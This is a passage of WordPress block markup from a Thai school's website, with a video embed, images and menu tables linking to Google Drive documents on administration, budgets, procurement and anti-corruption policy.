-->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" 